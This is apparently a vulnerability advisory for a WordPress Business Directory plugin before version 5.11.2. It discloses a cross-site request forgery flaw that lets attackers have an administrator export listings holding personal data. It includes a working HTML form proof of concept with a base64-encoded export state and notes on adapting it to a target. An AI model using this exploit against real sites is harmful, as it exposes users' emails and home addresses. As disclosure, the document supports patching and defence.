Business Directory Plugin < 5.11.2 - Arbitrary Listing Export
Description
The plugin suffered from a Cross-Site Request Forgery issue, allowing an attacker to make a logged in administrator export files, which could then be downloaded by the attacker to get access to PII, such as email, home addresses etc
Proof of Concept
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wpbdp-csv-export" />
<input type="hidden" name="state" value="eyJzZXR0aW5ncyI6eyJ0YXJnZXQtb3MiOiJtYWNvcyIsImNzdi1maWxlLXNlcGFyYXRvciI6Ilx0IiwiaW1hZ2VzLXNlcGFyYXRvciI6IjsiLCJjYXRlZ29yeS1zZXBhcmF0b3IiOiI7IiwidGVzdC1pbXBvcnQiOmZhbHNlLCJleHBvcnQtaW1hZ2VzIjpmYWxzZSwiaW5jbHVkZS11c2VycyI6IjEiLCJnZW5lcmF0ZS1zZXF1ZW5jZS1pZHMiOmZhbHNlLCJsaXN0aW5nX3N0YXR1cyI6ImFsbCIsImluY2x1ZGUtZXhwaXJhdGlvbi1kYXRlIjoiMSJ9LCJjb2x1bW5zIjpbImxpc3RpbmdfdGl0bGUiLCJsaXN0aW5nX2NhdGVnb3J5Iiwic2hvcnRfZGVzY3JpcHRpb24iLCJkZXNjcmlwdGlvbiIsIndlYnNpdGUiLCJwaG9uZSIsImVtYWlsIiwibGlzdGluZ190YWdzIiwiYWRkcmVzcyIsInppcF9jb2RlIiwic2NyaXB0YWxlcnR4c3MtMXNjcmlwdCIsInVzZXJuYW1lIiwiZmVlX2lkIiwiZXhwaXJlc19vbiJdLCJ3b3JraW5nZGlyIjoiXC92YXJcL3d3d1wvd29yZHByZXNzXC93cC1jb250ZW50XC91cGxvYWRzXC93cGJkcC1jc3YtZXhwb3J0c1wvNjA3MTc0M2M0MDc0MVwvIiwibGlzdGluZ3MiOls2NzVdLCJleHBvcnRlZCI6MCwiZmlsZXNpemUiOjAsImRvbmUiOmZhbHNlfQ==" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The state is base64 encoded and will need to be adapted to the target (the workingdir filed can also be set to an arbitrary existing location)
Affects Plugins
Fixed in version 5.11.2✓
References
Classification
Miscellaneous
Original Researcher
0xB9
Submitter
0xB9
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-04-12 (about 3 months ago)
Added
2021-04-12 (about 3 months ago)
Last Updated
2021-04-14 (about 3 months ago)